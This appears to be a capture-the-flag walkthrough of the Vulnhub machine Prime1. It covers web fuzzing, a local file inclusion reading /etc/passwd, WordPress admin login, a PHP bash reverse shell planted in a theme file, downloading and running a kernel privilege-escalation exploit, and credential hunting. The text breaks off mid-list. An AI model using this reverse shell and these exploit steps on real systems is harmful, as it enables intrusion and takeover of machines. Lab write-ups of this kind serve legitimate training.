Vulnhub box: Prime1
Approach one
Host discovery
nmap scan and analysis
Web penetration
Directory brute-forcing and fuzzing
Exploiting the file inclusion
Getting WordPress admin access
Getting the initial system shell
Privilege escalation via a kernel exploit
Rooted, and summary
Same routine as always: one full sweep~





Only 22 and 80 are open.
So the focus goes on the web service on port 80.
└─# dirb http://192.168.100.110
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 7 13:17:27 2024
URL_BASE: http://192.168.100.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.100.110/ ----
+ http://192.168.100.110/dev (CODE:200|SIZE:131)
+ http://192.168.100.110/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.100.110/javascript/
+ http://192.168.100.110/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.100.110/wordpress/
---- Entering directory: http://192.168.100.110/javascript/ ----
==> DIRECTORY: http://192.168.100.110/javascript/jquery/
---- Entering directory: http://192.168.100.110/wordpress/ ----
+ http://192.168.100.110/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-includes/
+ http://192.168.100.110/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.100.110/javascript/jquery/ ----
+ http://192.168.100.110/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/ ----
+ http://192.168.100.110/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/includes/
+ http://192.168.100.110/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-admin/user/
---- Entering directory: http://192.168.100.110/wordpress/wp-content/ ----
+ http://192.168.100.110/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.100.110/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.100.110/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/network/ ----
+ http://192.168.100.110/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.100.110/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-admin/user/ ----
+ http://192.168.100.110/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.100.110/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-content/plugins/ ----
+ http://192.168.100.110/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-content/themes/ ----
+ http://192.168.100.110/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.100.110/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Sep 7 13:17:55 2024
DOWNLOADED: 46120 - FOUND: 15
The first path found is /dev.
Visiting it returns this text:

Translated, it says we are at level 0 and should dig harder.
So we rerun dirb with extensions:
-X appends each given extension to every wordlist entry (comma-separated list),
here .zip and .txt.


Looks like you have some secrets.
I just want to help you a bit.
Do some fuzzing on every php page you found. If
you get any right parameter, then follow the steps below. If you are still stuck,
learn a basic tool with good usage for OSCP from here:
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see location.txt and you will get your next move//

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something
index.php here is the home page, which we have already looked at, so image.php is the suspicious one.
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something is the hinted command; for the first run we deliberately drop the filters,
i.e. no --hc 404 --hw 500, so we can see what the "nothing happened" response looks like. (If your shell is zsh, the Kali default, quote the URL: an unquoted ? is a glob there.)
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.100.110/image.php?FUZZ=RedteamNotes
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.100.110/image.php?FUZZ=RedteamNotes
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 6 L 12 W 147 Ch "@"
000000034: 200 6 L 12 W 147 Ch "adm"
000000033: 200 6 L 12 W 147 Ch "active"
000000015: 200 6 L 12 W 147 Ch "2001"
000000003: 200 6 L 12 W 147 Ch "01"
000000035: 200 6 L 12 W 147 Ch "admin"
000000031: 200 6 L 12 W 147 Ch "action"
000000030: 200 6 L 12 W 147 Ch "accounting"
000000007: 200 6 L 12 W 147 Ch "10"
000000032: 200 6 L 12 W 147 Ch "actions"
000000029: 200 6 L 12 W 147 Ch "account"
000000023: 200 6 L 12 W 147 Ch "aaa"
000000022: 200 6 L 12 W 147 Ch "aa"
000000026: 200 6 L 12 W 147 Ch "academic"
000000028: 200 6 L 12 W 147 Ch "accessgranted"
000000024: 200 6 L 12 W 147 Ch "abc"
000000025: 200 6 L 12 W 147 Ch "about"
000000021: 200 6 L 12 W 147 Ch "a"
000000027: 200 6 L 12 W 147 Ch "access"
000000020: 200 6 L 12 W 147 Ch "3"
000000019: 200 6 L 12 W 147 Ch "2005"
000000012: 200 6 L 12 W 147 Ch "20"
000000066: 200 6 L 12 W 147 Ch "appliance"
000000080: 200 6 L 12 W 147 Ch "auth"
000000075: 200 6 L 12 W 147 Ch "aspadmin"
000000077: 200 6 L 12 W 147 Ch "attach"
000000079: 200 6 L 12 W 147 Ch "audit"
000000076: 200 6 L 12 W 147 Ch "assets"
000000073: 200 6 L 12 W 147 Ch "arrow"
000000071: 200 6 L 12 W 147 Ch "archive"
000000072: 200 6 L 12 W 147 Ch "archives"
000000078: 200 6 L 12 W 147 Ch "attachments"
000000074: 200 6 L 12 W 147 Ch "asp"
(many lines omitted)
000000051: 200 6 L 12 W 147 Ch "agents"
000000047: 200 6 L 12 W 147 Ch "adminsql"
000000041: 200 6 L 12 W 147 Ch "Administration"
000000044: 200 6 L 12 W 147 Ch "admin_login"
000000045: 200 6 L 12 W 147 Ch "adminlogon"
000000046: 200 6 L 12 W 147 Ch "admin_logon"
000000048: 200 6 L 12 W 147 Ch "admon"
000000039: 200 6 L 12 W 147 Ch "administrat"
000000037: 200 6 L 12 W 147 Ch "admin_"
000000040: 200 6 L 12 W 147 Ch "administration"
000000043: 200 6 L 12 W 147 Ch "adminlogin"
000000081: 200 6 L 12 W 147 Ch "auto"
000000087: 200 6 L 12 W 147 Ch "backoffice"
000000111: 200 6 L 12 W 147 Ch "binaries"
000000922: 200 6 L 12 W 147 Ch "wellcome"
000000921: 200 6 L 12 W 147 Ch "welcome"
000000920: 200 6 L 12 W 147 Ch "webvpn"
000000918: 200 6 L 12 W 147 Ch "webstat"
000000919: 200 6 L 12 W 147 Ch "webstats"
000000917: 200 6 L 12 W 147 Ch "website"
000000915: 200 6 L 12 W 147 Ch "webservice"
000000914: 200 6 L 12 W 147 Ch "websearch"
000000916: 200 6 L 12 W 147 Ch "webservices"
000000913: 200 6 L 12 W 147 Ch "webmaster"
000000912: 200 6 L 12 W 147 Ch "webmail"
000000910: 200 6 L 12 W 147 Ch "weblogic"
000000911: 200 6 L 12 W 147 Ch "weblogs"
000000906: 200 6 L 12 W 147 Ch "webdist"
000000908: 200 6 L 12 W 147 Ch "WEB-INF"
000000905: 200 6 L 12 W 147 Ch "webdav"
000000909: 200 6 L 12 W 147 Ch "weblog"
000000904: 200 6 L 12 W 147 Ch "webdata"
000000902: 200 6 L 12 W 147 Ch "webboard"
000000901: 200 6 L 12 W 147 Ch "webapp"
000000903: 200 6 L 12 W 147 Ch "webcart"
000000898: 200 6 L 12 W 147 Ch "web"
000000897: 200 6 L 12 W 147 Ch "wdav"
000000894: 200 6 L 12 W 147 Ch "W3SVC2"
000000900: 200 6 L 12 W 147 Ch "webadmin"
000000896: 200 6 L 12 W 147 Ch "warez"
000000945: 200 6 L 12 W 147 Ch "xsl"
000000949: 200 6 L 12 W 147 Ch "zip"
000000943: 200 6 L 12 W 147 Ch "xml"
000000946: 200 6 L 12 W 147 Ch "xsql"
000000944: 200 6 L 12 W 147 Ch "xmlrpc"
000000951: 200 6 L 12 W 147 Ch "zips"
000000950: 200 6 L 12 W 147 Ch "zipfiles"
000000948: 200 6 L 12 W 147 Ch "zap"
000000947: 200 6 L 12 W 147 Ch "xyz"
Total time: 0
Processed Requests: 951
Filtered Requests: 0
Requests/sec.: 0
Then filter based on these results.
Almost everything is 147 Ch, i.e. 147 characters: that is the baseline response for a parameter the page ignores.
We hide it with --hh:
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.100.110/image.php?FUZZ=RedteamNotes
Result: nothing left at all...
Same with --hw 12.
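Spotting "147 Ch" by eye is what wfuzz's --hh (or --hh BBB) automates. The shell function below is an added example, not part of the original post: it reads saved wfuzz output, finds the most frequent Chars value and prints only the lines that deviate from it. The sample lines are constructed from the run above plus one made-up outlier ("file", 206 Ch) standing in for a real hit.

```shell
#!/bin/sh
# Added example: baseline filtering of wfuzz results, the manual equivalent of
# `wfuzz --hh <baseline>`. Input format is wfuzz's default table:
#   000000001:   200        6 L      12 W       147 Ch      "@"
# Field 7 is the character count.

# sample_wfuzz: constructed input; the "file" line is a made-up outlier.
sample_wfuzz() {
    cat <<'EOF'
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000001:   200        6 L      12 W       147 Ch      "@"
000000034:   200        6 L      12 W       147 Ch      "adm"
000000035:   200        6 L      12 W       147 Ch      "admin"
000000300:   200        7 L      15 W       206 Ch      "file"
000000949:   200        6 L      12 W       147 Ch      "zip"
EOF
}

# hide_baseline: read wfuzz output on stdin, compute the most common Chars
# value (the response for a parameter the page ignores) and print every
# result line whose Chars value differs from it. Header lines are skipped.
hide_baseline() {
    awk '
        /^[0-9]+:/ { n++; line[n] = $0; ch[n] = $7; count[$7]++ }
        END {
            best = ""; max = 0
            for (c in count) if (count[c] > max) { max = count[c]; best = c }
            for (i = 1; i <= n; i++) if (ch[i] != best) print line[i]
        }
    '
}

# Usage: wfuzz ... > fuzz.txt; hide_baseline < fuzz.txt
# or:    sh hide_baseline.sh --demo
if [ "${1:-}" = "--demo" ]; then
    sample_wfuzz | hide_baseline
fi
```

On a real run, check the Lines and Words columns as well: a parameter that changes only a number in the page may keep the character count identical while the word count shifts, which is why the original hint filters on --hw too.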

image.php turned out to be a decoy...
In the end the parameter was found on index.php.

Let's see what the file parameter does.

It tells us nice work, but we are digging the wrong file.
So we add the location.txt hinted at earlier:
http://192.168.100.110/index.php?file=location.txt

OK, now you know the exact parameter.
Now dig some more for the next one.
Use the 'secrettier360' parameter on some other php page for more fun.
It says some other php page; apart from index.php, the only candidate is image.php.
curl http://192.168.100.110/image.php?secrettier360=

Now we have to think for ourselves: the parameter reads a file, so local file inclusion comes to mind,
just as file=location.txt on index.php read a file for us.
That is exactly a local file inclusion, so traverse up to /etc/passwd:
curl http://192.168.100.110/image.php?secrettier360=../../../../../../../etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
Save these users locally, then check which of them have a login shell.

Apart from root, only victor has a shell listed. One caveat: saket's shell field is empty, and passwd(5) treats an empty field as /bin/sh, so that account is not locked out either.
Let's take a look.
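Picking the interactive accounts out of a passwd dump is routine enough to script. The function below is an added example, not from the original post; its input is a constructed subset of the lines the LFI returned above, and it handles the edge case the eyeball pass misses: an empty shell field means /bin/sh, not "no login".

```shell
#!/bin/sh
# Added example: which accounts in a passwd(5) dump can actually log in?
# login(1) gives an account with an EMPTY shell field the default /bin/sh,
# so that case must be reported, not skipped.

# sample_passwd: constructed input, a subset of the /etc/passwd lines the
# LFI returned (saket's trailing ':' with nothing after it is the edge case).
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
EOF
}

# login_shells: read passwd(5) lines on stdin and print "user:shell" for each
# account that gets an interactive shell. Stubs such as nologin, false, true
# and the sync pseudo-shell are dropped; an empty 7th field becomes /bin/sh.
login_shells() {
    awk -F: '
        NF < 7 { next }                                   # skip malformed lines
        { shell = ($7 == "") ? "/bin/sh" : $7 }           # empty field => /bin/sh
        shell !~ /(nologin|false|true|sync)$/ { print $1 ":" shell }
    '
}

# Usage: login_shells < passwd.txt   or   sh login_shells.sh --demo
if [ "${1:-}" = "--demo" ]; then
    sample_passwd | login_shells
fi
```

For the sample above this yields root, victor and saket, which is why the password found a moment later is worth trying against more than one account.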


emmm, we got a password:
follow_the_ippsec
Let's try logging in over SSH with it.


We also know from earlier that this is a WordPress site, so we can try it there,

since it is the best-known CMS there is.
wpscan has a great many options:
-e, --enumerate [OPTS] Enumeration Process
Available Choices:
vp Vulnerable plugins
ap All plugins
p Popular plugins
vt Vulnerable themes
at All themes
t Popular themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g: u1-5
Range separator to use: '-'
Value if no argument supplied: 1-10
m Media IDs range. e.g m1-15
Note: Permalink setting must be set to "Plain" for those to be detected
Range separator to use: '-'
Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
Incompatible choices (only one of each group/s can be used):
- vp, ap, p
- vt, at, t
u User IDs range. e.g: u1-5
└─# wpscan --url http://192.168.100.110/wordpress -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.100.110/wordpress/ [192.168.100.110]
[+] Started: Sun Sep 8 10:11:29 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.100.110/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.100.110/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.100.110/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.100.110/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.100.110/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.100.110/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Sep 8 10:11:31 2024
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.017 KB
[+] Data Received: 21.981 MB
[+] Memory used: 182.785 MB
[+] Elapsed time: 00:00:02
The key part:
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
This enumerates a user named victor.
victor
follow_the_ippsec
Log straight into the backend:
http://192.168.100.110/wordpress/wp-admin/
and the login succeeds.

Once inside the WordPress backend the moves are pretty routine; there are only a few places worth going:
plugins
themes

Look at the text at the bottom:
You need to make this file writable before you can save your changes. See the Codex for more information.
Go through the theme files one by one; not every file is writable.
Eventually we find a php file that can be modified.

Insert the reverse shell (the /bin/bash -c wrapper is needed because >& and /dev/tcp are bash features, not sh):
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.100.100/443 0>&1'");?>
The path that triggers it turns out to be
http://192.168.100.110/wordpress/wp-content/themes/twentynineteen/secret.php
With a listener already waiting on 192.168.100.100:443 (for example nc -lvnp 443), requesting that URL gives us the reverse shell.

OK, at this point we have a foothold.
First have a look around and do some enumeration to prepare for privilege escalation.

Here we can see a binary that runs as root with no password required: (root) NOPASSWD: /home/saket/enc


Next, check the kernel version and try a kernel exploit.

There are two privilege-escalation exploits listed for this version.

Copy one down first to have a look:
searchsploit -m 45010
and see what it contains:
/*
Credit @bleidl, this is a slight modification to his original POC
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
For details on how the exploit works, please visit
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
Tested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/
The header is straightforward and even gives the compile command:
gcc 45010.c -o 45010
You can compile it locally or upload it to the target and compile it there.
On Kali, start a PHP web server to serve the files:
php -S 0:80

/tmp is the usual choice because it is world-writable. It is not guaranteed to allow execution, though: check that it is not mounted noexec (mount | grep /tmp) before relying on running binaries from it; /dev/shm is the common fallback.


Upload both the compiled 45010 and the 45010.c source,
because a binary built on Kali may not run against the target's libc, in which case it must be compiled on the target (check that gcc is present there first).
wget http://192.168.100.100/45010
wget http://192.168.100.100/45010.c


ok~ rooted
Second privilege escalation approach
After getting the initial reverse shell from the WordPress backend, the kernel exploit is not the only option. A kernel exploit's effect on the system is unpredictable: it can crash the box or restart services, and either costs us the initial shell.
So rewind to the moment we got the WordPress reverse shell.
From /etc/passwd we had already seen
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
so we look in /home/saket.

find / -name '*backup*' 2>/dev/null | sort | less

/opt/backup
/opt/backup/server_database/backup_pass

And we do find the password for enc:
backup_password

There is a very important point here:
echo appends a newline to its output,

which changes the resulting md5 completely; the whole difficulty is that newline.

So when using echo, pass -n (or use printf '%s')
so that no newline is emitted.

└─# echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1
Now the job is to use this key
to decrypt the blob below; the command will have this shape, with the cipher and the key still to be filled in:
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -CipherType -K
Let's first read the openssl help carefully:
└─# openssl --help
help:
Standard commands
asn1parse ca ciphers cmp
cms crl crl2pkcs7 dgst
dhparam dsa dsaparam ec
ecparam enc engine errstr
fipsinstall gendsa genpkey genrsa
help info kdf list
mac nseq ocsp passwd
pkcs12 pkcs7 pkcs8 pkey
pkeyparam pkeyutl prime rand
rehash req rsa rsautl
s_client s_server s_time sess_id
smime speed spkac srp
storeutl ts verify version
x509
Message Digest commands (see the `dgst' command for more details)
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
Save everything except the standard commands; we will loop over that list with a script later. (Strictly only the "Cipher commands" block is useful: enc rejects digest names such as blake2b512, as the errors further down show, and openssl enc -list prints exactly the ciphers it accepts.)
Saved like this:
└─# cat CipherTypeRaw
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
